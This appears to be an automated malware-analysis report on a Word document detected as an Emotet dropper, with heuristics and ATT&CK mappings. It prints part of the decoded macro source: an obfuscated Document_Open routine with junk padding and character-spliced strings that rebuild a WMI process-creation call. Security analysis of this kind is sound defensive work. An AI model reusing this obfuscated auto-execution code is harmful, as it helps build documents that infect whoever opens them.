Verdict: MALICIOUS (Risk Score: 202)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open auto-execution macro, which is a common technique for Emotet. The ClamAV detection name 'Doc.Dropper.EmotetIOS-9402070-0' strongly suggests Emotet. The macros likely execute code to download and run a secondary payload, a hallmark of Emotet droppers.
Heuristics (6)

- ClamAV: Doc.Dropper.EmotetIOS-9402070-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.EmotetIOS-9402070-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16213 bytes |

SHA-256: 58029508ecef74b3fcf3b15f6596f5dd43fa06e572eeee4af1ca7c08f1b5f25d

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Y8wi6j3re60"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
X1jcat8bj69 = Array(Hkghng2mjrje + "Gdnc0dhaqpxSo3lh5sh6asrp3c I3qqfb3qu0l3" + E67tyx4_bcy38hiv, Rhbbyz0hpzwm2is2sy, Aobvj39yx0cf.Jbaye53kgeag, Q93fkgl14zj5 + "Wyle1ytg8mj0gyk Dbptc908b37n0gsf6 Lc8ob5f_1ws Csa6xy5lr91p")
End Sub
Attribute VB_Name = "Aobvj39yx0cf"
Attribute VB_Base = "0{B5C515F1-D675-4F08-86DA-787E5FE3BCF8}{8D73C291-A9EE-4579-8A46-A557ACEFB6C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Jbaye53kgeag()
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JHNklHS
Fau7uko5s_qvrslth = Atn(ihKLNsad)
Fau7uko5s_qvrslth = Log(323)
Case "Gnw38uyvfyo99kd25j"
Fau7uko5s_qvrslth = 288262913
Fau7uko5s_qvrslth = u23ioyhiggukjjs
End Select
Select Case Ca5fot23y8e
Case "Rb2jt6j0yjs6z5cjqf"
Fau7uko5s_qvrslth = 88383833333#
Fau7uko5s_qvrslth = (qwlhusaidbwq)
Case "B08v9qiiif3_zby1"
Fau7uko5s_qvrslth = lkqwhnekqwn
Fau7uko5s_qvrslth = Log(345345)
Fau7uko5s_qvrslth = Atn(jsghi2lklqw)
Fau7uko5s_qvrslth = smbdjlsblkhwqewqd
End Select
Kvnllc589wk = 105
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JHNklHS
Fau7uko5s_qvrslth = Atn(ihKLNsad)
Fau7uko5s_qvrslth = Log(323)
Case "Gnw38uyvfyo99kd25j"
Fau7uko5s_qvrslth = 288262913
Fau7uko5s_qvrslth = u23ioyhiggukjjs
End Select
Select Case Ca5fot23y8e
Case "Rb2jt6j0yjs6z5cjqf"
Fau7uko5s_qvrslth = 88383833333#
Fau7uko5s_qvrslth = (qwlhusaidbwq)
Case "B08v9qiiif3_zby1"
Fau7uko5s_qvrslth = lkqwhnekqwn
Fau7uko5s_qvrslth = Log(345345)
Fau7uko5s_qvrslth = Atn(jsghi2lklqw)
Fau7uko5s_qvrslth = smbdjlsblkhwqewqd
End Select
Rjy6rjxptk3xmqq_ = Chr$(Kvnllc589wk + (10))
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JHNklHS
Fau7uko5s_qvrslth = Atn(ihKLNsad)
Fau7uko5s_qvrslth = Log(323)
Case "Gnw38uyvfyo99kd25j"
Fau7uko5s_qvrslth = 288262913
Fau7uko5s_qvrslth = u23ioyhiggukjjs
End Select
Select Case Ca5fot23y8e
Case "Rb2jt6j0yjs6z5cjqf"
Fau7uko5s_qvrslth = 88383833333#
Fau7uko5s_qvrslth = (qwlhusaidbwq)
Case "B08v9qiiif3_zby1"
Fau7uko5s_qvrslth = lkqwhnekqwn
Fau7uko5s_qvrslth = Log(345345)
Fau7uko5s_qvrslth = Atn(jsghi2lklqw)
Fau7uko5s_qvrslth = smbdjlsblkhwqewqd
End Select
Cbtk2k88c_jy_1_ = "b3bb 17t2 fvhvhjb3bb 17t2 fvhvhjwb3bb 17t2 fvhvhjib3bb 17t2 fvhvhjnmb3bb 17t2 fvhvhjb3bb 17t2 fvhvhjgmb3bb 17t2 fvhvhjtb3bb 17t2 fvhvhjb3bb 17t2 fvhvhj" + Rjy6rjxptk3xmqq_ + "b3bb 17t2 fvhvhjb3bb 17t2 fvhvhj:b3bb 17t2 fvhvhjwb3bb 17t2 fvhvhjinb3bb 17t2 fvhvhjb3bb 17t2 fvhvhj3b3bb 17t2 fvhvhj2b3bb 17t2 fvhvhj_b3bb 17t2 fvhvhj" + Aobvj39yx0cf.Wybwegjc6e0r7 + "b3bb 17t2 fvhvhjrob3bb 17t2 fvhvhjb3bb 17t2 fvhvhjceb3bb 17t2 fvhvhjsb3bb 17t2 fvhvhjsb3bb 17t2 fvhvhj"
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JHNklHS
Fau7uko5s_qvrslth = Atn(ihKLNsad)
Fau7uko5s_qvrslth = Log(323)
Case "Gnw38uyvfyo99kd25j"
Fau7uko5s_qvrslth = 288262913
Fau7uko5s_qvrslth = u23ioyhiggukjjs
End Select
Select Case Ca5fot23y8e
Case "Rb2jt6j0yjs6z5cjqf"
Fau7uko5s_qvrslth = 88383833333#
Fau7uko5s_qvrslth = (qwlhusaidbwq)
Case "B08v9qiiif3_zby1"
Fau7uko5s_qvrslth = lkqwhnekqwn
Fau7uko5s_qvrslth = Log(345345)
Fau7uko5s_qvrslth = Atn(jsghi2lklqw)
Fau7uko5s_qvrslth = smbdjlsblkhwqewqd
End Select
N8l5de12k2e53e5ts0 = T0r4vnpw2jk534(Cbtk2k88c_jy_1_)
On Error Resume Next
Select Case Zhx1yt7ra7h9d
Case "Ih_g2jq6i0z"
Fau7uko5s_qvrslth = (UIbjsahlkdas)
Fau7uko5s_qvrslth = JH
... (truncated)